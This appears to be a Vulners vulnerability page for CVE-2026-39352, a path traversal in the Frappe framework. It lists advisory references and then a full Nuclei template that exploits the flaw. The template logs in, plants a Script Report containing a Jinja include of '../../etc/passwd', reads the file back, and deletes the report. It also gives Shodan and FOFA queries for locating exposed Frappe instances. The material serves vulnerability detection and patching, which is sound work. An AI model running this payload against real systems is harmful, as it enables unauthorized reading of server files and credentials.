| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2026-39352 | 20 May 202619:27 | – | attackerkb | |
| CVE-2026-39352 | 25 May 202609:50 | – | circl | |
| Frappe 路径遍历漏洞 | 20 May 202600:00 | – | cnnvd | |
| CVE-2026-39352 | 20 May 202619:27 | – | cve | |
| CVE-2026-39352 Frappe has an Arbitrary File Read via Path Traversal in render_include | 20 May 202619:27 | – | cvelist | |
| EUVD-2026-31178 | 20 May 202619:27 | – | euvd | |
| CVE-2026-39352 | 20 May 202620:16 | – | nvd | |
| PT-2026-42259 | 20 May 202600:00 | – | ptsecurity | |
| CVE-2026-39352 | 21 May 202619:57 | – | redhatcve | |
| CVE-2026-39352 Frappe has an Arbitrary File Read via Path Traversal in render_include | 20 May 202619:27 | – | vulnrichment |
id: CVE-2026-39352
info:
name: Frappe Framework < 16.15.0 - Arbitrary File Read via render_include Path Traversal
author: DhiyaneshDK
severity: medium
description: |
Frappe is a full-stack web application framework. Versions prior to 15.105.0 and 16.15.0 contain a possible Arbitrary File Read vulnerability via Path Traversal. The issue is resolved in versions 16.15.0, 15.105.0 and above.
impact: |
Attackers can read arbitrary files, potentially exposing sensitive information.
remediation: Update to version 15.105.0, 16.15.0 or later.
reference:
- https://github.com/frappe/frappe/security/advisories/GHSA-67rf-pxgh-vfqv
- https://github.com/frappe/frappe/commit/b5ab941788f6232b4f9313432ea7bfb61389fbfd
- https://github.com/frappe/frappe/pull/38215
- https://nvd.nist.gov/vuln/detail/CVE-2026-39352
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2026-39352
epss-score: 0.01279
epss-percentile: 0.66442
cwe-id: CWE-22
metadata:
verified: true
max-request: 4
vendor: frappe
product: frappe
shodan-query: http.title:"Login" http.html:"frappe"
fofa-query: title="Login" && body="frappe"
tags: cve,cve2026,frappe,lfi,authenticated,file-read
flow: http(1) && http(2) && http(3) && http(4)
variables:
username: "{{username}}"
password: "{{password}}"
http:
- raw:
- |
POST /api/method/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
usr={{username}}&pwd={{password}}
matchers:
- type: word
part: body
words:
- "Logged In"
internal: true
- raw:
- |
POST /api/resource/Report HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"doctype":"Report","report_name":"nuclei_cve2026_39352_{{randstr}}","report_type":"Script Report","ref_doctype":"User","is_standard":"No","disabled":0,"javascript":"{% include 'frappe/../../../../../../../../../../etc/passwd' %}"}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "nuclei_cve2026_39352")'
condition: and
internal: true
- raw:
- |
GET /api/method/frappe.desk.query_report.get_script?report_name=nuclei_cve2026_39352_{{randstr}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- regex('root:.*:0:0:', body)
- contains(content_type, "application/json")
- status_code == 200
condition: and
- raw:
- |
DELETE /api/resource/Report/nuclei_cve2026_39352_{{randstr}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- contains_all(body, "data","ok")
- contains(content_type, "application/json")
- status_code == 202
condition: and
internal: true
# digest: 4b0a00483046022100f9320cc5b8353a62c88aacf6207893ec8f7d39f4f6874449cc1701911acbe078022100e8235df5c9074a046040bdba6507f2433852ed646858980110f0cc32fe07d7ec:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation